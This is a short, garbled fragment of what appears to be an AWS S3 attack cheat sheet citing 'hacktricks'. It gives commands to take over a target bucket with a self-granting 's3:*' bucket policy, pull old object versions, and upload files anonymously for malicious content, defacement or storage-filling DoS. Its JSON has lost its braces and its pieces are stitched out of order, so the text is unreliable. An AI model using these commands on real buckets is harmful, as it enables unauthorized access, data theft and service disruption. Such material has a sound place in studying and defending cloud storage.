"Version": "2012-10-17", "Statement": [ "Effect": "Allow", "Principal": "AWS": "arn:aws:iam::YOUR_ACCOUNT:user/your-user", "Action": "s3:*", "Resource": ["arn:aws:s3:::target-bucket", "arn:aws:s3:::target-bucket/*"] ]
aws s3api put-bucket-policy --bucket target-bucket --policy file://policy.json Example policy to grant yourself full access: hacktricks aws s3
Download all files
aws s3api list-object-versions --bucket target-bucket Then download older version: "Statement": [ "Effect": "Allow"
echo "test" > test.txt aws s3 cp test.txt s3://target-bucket/test.txt --no-sign-request Upload malicious files, defacement, or fill storage (DoS). 2.3. Bucket Permissions – s3:GetObjectAcl If you can read ACLs but not objects: hacktricks aws s3